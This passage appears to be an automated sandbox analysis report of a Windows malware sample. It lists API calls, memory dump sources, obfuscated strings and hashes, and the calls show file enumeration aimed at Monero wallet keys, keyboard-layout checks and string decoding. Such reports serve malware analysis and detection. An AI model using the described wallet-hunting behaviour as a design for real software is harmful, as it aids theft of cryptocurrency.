                    • StrCmpCA.SHLWAPI(?,004914CC), ref: 0047DEC4
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0047E3E0
                    • FindClose.KERNEL32(000000FF), ref: 0047E3F2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                    • String ID: \*.*
                    • API String ID: 2325840235-1173974218
                    • Opcode ID: e93dd20e70d6e7c1caff1953c040fe7dc766d5185f2a3e776c6c75ef50aad7fc
                    • Instruction ID: 7d9eba2c5624eb80f3a891cefba344bfbb66d497da41f071a47a7dae5029bdd3
                    • Opcode Fuzzy Hash: e93dd20e70d6e7c1caff1953c040fe7dc766d5185f2a3e776c6c75ef50aad7fc
                    • Instruction Fuzzy Hash: A7F1B0718141189AEB15FB61CC95EEE7338AF14304F5049EFA40A62051EF7C6B9ACF7A
                    Function 0047DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                      • Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
                      • Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982
                      • Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
                      • Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
                      • Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12
                      • Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004914B0,00490C2A), ref: 0047DAEB
                    • StrCmpCA.SHLWAPI(?,004914B4), ref: 0047DB33
                    • StrCmpCA.SHLWAPI(?,004914B8), ref: 0047DB49
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0047DDCC
                    • FindClose.KERNEL32(000000FF), ref: 0047DDDE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                    • String ID:
                    • API String ID: 3334442632-0
                    • Opcode ID: 934ab1a227b88e9f8b1a1bc4bf7a4c5bd7370530aaedf2860f1c4338f8769abd
                    • Instruction ID: 5e2304b5bc2c92ff68ec59bc82474d467e8624b4345790d16c4f6722ce7bc2e8
                    • Opcode Fuzzy Hash: 934ab1a227b88e9f8b1a1bc4bf7a4c5bd7370530aaedf2860f1c4338f8769abd
                    • Instruction Fuzzy Hash: 029177729101049BDB14FBB1DC569ED737DAF84304F008A6FF80A96141EE7CAB59CBA6
                    Function 008470EE Relevance: 12.9, Strings: 9, Instructions: 1656COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: r}}$"r5$*G>~$1&?>$[9Ss$hg'$ig'$l>S_$v_S
                    • API String ID: 0-1819126714
                    • Opcode ID: 3297d4f9e53efa9b72719e3b2bdc64bc9b1eb75392b2249e68bdde02c1dcc8a5
                    • Instruction ID: 0b98295f8a1d1a48463764b790017cc5183e6dedd1c54c8edc5d458bb3d1741d
                    • Opcode Fuzzy Hash: 3297d4f9e53efa9b72719e3b2bdc64bc9b1eb75392b2249e68bdde02c1dcc8a5
                    • Instruction Fuzzy Hash: 65B225F360C6049FE3046E2DEC8567ABBE5EF84320F16893DEAC5C7744EA3598418697
                    Function 00487B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                    • GetKeyboardLayoutList.USER32(00000000,00000000,004905AF), ref: 00487BE1
                    • LocalAlloc.KERNEL32(00000040,?), ref: 00487BF9
                    • GetKeyboardLayoutList.USER32(?,00000000), ref: 00487C0D
                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00487C62
                    • LocalFree.KERNEL32(00000000), ref: 00487D22
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                    • String ID: /
                    • API String ID: 3090951853-4001269591
                    • Opcode ID: b443847c6f64ad037cfc24f6a5968467a3fdc156fd0151f39d102eb4382ebc08
                    • Instruction ID: 90eb398c0de0dc9a64c2feb4b37dce4eb933fa3f34ffc50af2ed5d1adba31179
                    • Opcode Fuzzy Hash: b443847c6f64ad037cfc24f6a5968467a3fdc156fd0151f39d102eb4382ebc08
                    • Instruction Fuzzy Hash: D9417271900118ABDB24EF94DC99BEEB374FF44704F2045DAE00962180DB786F85CFA5
                    Function 0047E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                      • Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
                      • Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982
                      • Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
                      • Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
                      • Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12
                      • Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00490D73), ref: 0047E4A2
                    • StrCmpCA.SHLWAPI(?,004914F8), ref: 0047E4F2
                    • StrCmpCA.SHLWAPI(?,004914FC), ref: 0047E508
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0047EBDF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                    • String ID: \*.*
                    • API String ID: 433455689-1173974218
                    • Opcode ID: 16f2f1ec1e466b6f2f14e8cafef8873ff524f7dbf39a155ce1a56aae2b58604a
                    • Instruction ID: e152044c96f9c27055d3efb76722edf6ffdbaccc2db2207c56d7c8e9ad6cc483
                    • Opcode Fuzzy Hash: 16f2f1ec1e466b6f2f14e8cafef8873ff524f7dbf39a155ce1a56aae2b58604a
                    • Instruction Fuzzy Hash: 2E1274719001189AEB14FB61DC96EED7338AF54304F4049AFB50A62091EF7C6F59CFAA
                    Function 00843AFE Relevance: 9.2, Strings: 6, Instructions: 1650COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: Pg~$/jgo$1u/$3T}$5P^~$K0o
                    • API String ID: 0-49670031
                    • Opcode ID: 255c91b3c45fc85ad9912353b137cad5d200a4c18ae6276bd11e5b9d4fcd035f
                    • Instruction ID: d82538009dd95d882e8e222ba276ea41b4be6f6e2d4750e8709586dc9d2649b4
                    • Opcode Fuzzy Hash: 255c91b3c45fc85ad9912353b137cad5d200a4c18ae6276bd11e5b9d4fcd035f
                    • Instruction Fuzzy Hash: 34B206F360C2049FE304BE29EC8577ABBE9EF94720F16893DE6C5C7744EA3558018696
                    Function 00479AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                    Download Yara Rule
                    APIs
                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NG,00000000,00000000), ref: 00479AEF
                    • LocalAlloc.KERNEL32(00000040,?,?,?,00474EEE,00000000,?), ref: 00479B01
                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NG,00000000,00000000), ref: 00479B2A
                    • LocalFree.KERNEL32(?,?,?,?,00474EEE,00000000,?), ref: 00479B3F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: BinaryCryptLocalString$AllocFree
                    • String ID: NG
                    • API String ID: 4291131564-1651712548
                    • Opcode ID: 76f8ebf436b228a16595d696de2467162ac68d1a1212a1c20533ab858e029016
                    • Instruction ID: 4926eff5244f52d61585f180d721c3ba143e8e50fe3a641a7a5e34c8d0794340
                    • Opcode Fuzzy Hash: 76f8ebf436b228a16595d696de2467162ac68d1a1212a1c20533ab858e029016
                    • Instruction Fuzzy Hash: 4B11A4B4240308AFEB10CFA4DC95FAA77B5FB89700F208159FA199B390C775A941CB94
                    Function 0083E98A Relevance: 7.9, Strings: 5, Instructions: 1652COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: AMz7$E}{$[>FR$_Fsw$~*&
                    • API String ID: 0-950904821
                    • Opcode ID: 051e973b3d7aca4181425186249e9a32f6d9f836d04c14f5cf37406ab6cefd8f
                    • Instruction ID: 25e0746759313f86c7d2f5b3ed7b6a33a87638242c428fb3787c19451d89b932
                    • Opcode Fuzzy Hash: 051e973b3d7aca4181425186249e9a32f6d9f836d04c14f5cf37406ab6cefd8f
                    • Instruction Fuzzy Hash: 7DB2F9F36082049FE304AE2DEC8567AB7E9EFD4720F1A493DEAC4C3744E63599058697
                    Function 0083B631 Relevance: 7.8, Strings: 5, Instructions: 1574COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: A?$Q<[$Zw$^*_$ox~G
                    • API String ID: 0-1371497916
                    • Opcode ID: 45f7c82e0fece7b283e7a2ac59a91ecf315e16a8a1a1a37cb502dfa33b6c42f6
                    • Instruction ID: b8a79fba08bd617a0f79415426ac6dda59abed1a0c1579d7c701f1560f8730fa
                    • Opcode Fuzzy Hash: 45f7c82e0fece7b283e7a2ac59a91ecf315e16a8a1a1a37cb502dfa33b6c42f6
                    • Instruction Fuzzy Hash: 59A227F36082009FE304AE2DDC8567ABBE9EFD4720F16493DEAC4C7744E63598158697
                    Function 0084056C Relevance: 7.8, Strings: 5, Instructions: 1573COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: .Yw*$an}$zvu$}|8o$9o>
                    • API String ID: 0-3365920127
                    • Opcode ID: bfe184f37079de0c13e7d02b052e7dc81664364815015e75d6da8ee1911b4338
                    • Instruction ID: 6ad5ab40fc248e5db47375db69199737336e3cbc6e9cbf8c67767dd4d057db96
                    • Opcode Fuzzy Hash: bfe184f37079de0c13e7d02b052e7dc81664364815015e75d6da8ee1911b4338
                    • Instruction Fuzzy Hash: C7B208F3A082049FD304AE2DEC8567ABBE5EF94720F1A453DEAC4C7744EA3598048797
                    Function 0047C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                    Download Yara Rule
                    APIs
                    • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0047C871
                    • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0047C87C
                    • lstrcat.KERNEL32(?,00490B46), ref: 0047C943
                    • lstrcat.KERNEL32(?,00490B47), ref: 0047C957
                    • lstrcat.KERNEL32(?,00490B4E), ref: 0047C978
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
